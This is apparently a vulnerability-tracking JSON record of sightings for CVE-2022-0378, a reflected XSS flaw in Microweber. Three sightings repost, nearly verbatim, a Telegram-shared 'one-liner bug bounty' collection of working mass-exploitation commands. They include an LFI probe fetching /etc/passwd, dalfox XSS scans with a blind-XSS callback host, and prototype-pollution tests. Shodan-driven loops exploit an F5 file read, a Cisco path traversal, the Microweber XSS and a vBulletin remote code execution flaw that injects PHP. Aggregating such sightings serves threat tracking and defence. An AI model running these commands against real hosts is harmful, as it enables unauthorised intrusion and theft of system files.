{"vulnerability": "CVE-2022-0378", "sightings": [{"uuid": "5df5980b-2039-4e40-9785-80ec3e76b5f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/Secur_information_technology/50", "content": "Awesome One-liner Bug Bounty :\n\n> A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'\n### Open-redirect\n\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! %\"'\n\n`bash\ncat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null\n\n### XSS\n> @cihanmehmet\n\nbash\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n\n\n\nbash\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt\n\n\n\nbash\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n\n### Prototype Pollution\n\n\nbash\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\\/?proto[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n\n### CVE-2020-5902\n\nbash\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n\n### CVE-2020-3452\n\n\nbash\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" | head | grep -q \"Cisco\" && echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done < HOSTS.txt\n\n### CVE-2022-0378\n\n\nbash\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x\"|grep -qs \"onmouse\" && echo \"$h: VULNERABLE\"; done\n\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n\n\nbash\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;`\n\n### Find JavaScript Files", "creation_timestamp": "2024-05-19T19:36:04.000000Z"}, {"uuid": "bbeccac3-7bdd-4316-9adf-e28c1d41af99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "Telegram/nStt2837JwMi-pNwVNAVKFW1pW6ax87VAsIJlp6SBOAsR3PR", "content": "", "creation_timestamp": "2024-04-07T22:52:53.000000Z"}, {"uuid": "fc5d795f-1e35-4d21-820a-4d148c1f926f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "Telegram/XEixgT2v6lVv-v10WCuCZF76lOmF7s1VJYhuh16MDU2-kpuT", "content": "", "creation_timestamp": "2024-07-16T11:41:25.000000Z"}, {"uuid": "5913412e-4e84-45d1-b6c5-4ad91e56b487", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "seen", "source": "https://t.me/cibsecurity/36316", "content": "\u203c CVE-2022-0378 \u203c\n\nCross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-01-26T18:19:44.000000Z"}, {"uuid": "6dbf732b-766c-493f-a1ce-b1569434c8fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "seen", "source": "https://gist.github.com/spynika/d36f61ba985c86eb9bce7b0d4251331c", "content": "", "creation_timestamp": "2025-02-24T06:35:53.000000Z"}, {"uuid": "29cf55ce-624f-4408-bcc1-a139726267a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/328", "content": "Awesome One-liner Bug Bounty :\n\n> A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n> @dwisiswant0\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'\n### Open-redirect\n> @dwisiswant0\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! %\"'\n> @N3T_hunt3r\ncat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null\n### XSS\n> @cihanmehmet\n\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n> @fanimalikhack\n\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt\n> @oliverrickfors\n\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n### Prototype Pollution\n> @R0X4R\n\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\\/?__proto__[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n### CVE-2020-5902\n> @Madrobot_\n\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n### CVE-2020-3452\n> @vict0ni\n\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" | head | grep -q \"Cisco\" && echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done < HOSTS.txt\n### CVE-2022-0378\n> @7h3h4ckv157\n\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x\"|grep -qs \"onmouse\" && echo \"$h: VULNERABLE\"; done\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n> @Madrobot_\n\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;\n### Find JavaScript Files\n> @D0cK3rG33k", "creation_timestamp": "2024-04-07T05:37:53.000000Z"}, {"uuid": "ee44d5b7-4a3f-4534-8be7-d79abde3eec6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/ctftm/604", "content": "Awesome One-liner Bug Bounty :\n\n> A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'\n### Open-redirect\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! %\"'\n```bash\ncat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null\n\n### XSS\n\nbash\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n\n\nbash\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt\n\n\nbash\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n\n### Prototype Pollution\n\nbash\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\\/?proto[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n\n### CVE-2020-5902\n\nbash\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n\n### CVE-2020-3452\n\nbash\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" | head | grep -q \"Cisco\" && echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done < HOSTS.txt\n\n### CVE-2022-0378\n> @7h3h4ckv157\n\nbash\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x\"|grep -qs \"onmouse\" && echo \"$h: VULNERABLE\"; done\n\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n\nbash\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;`\n\n### Find JavaScript Files\n====================\nJoin Our Telegram Channel\nhttps://t.me/ctftm", "creation_timestamp": "2024-05-04T18:47:12.000000Z"}]}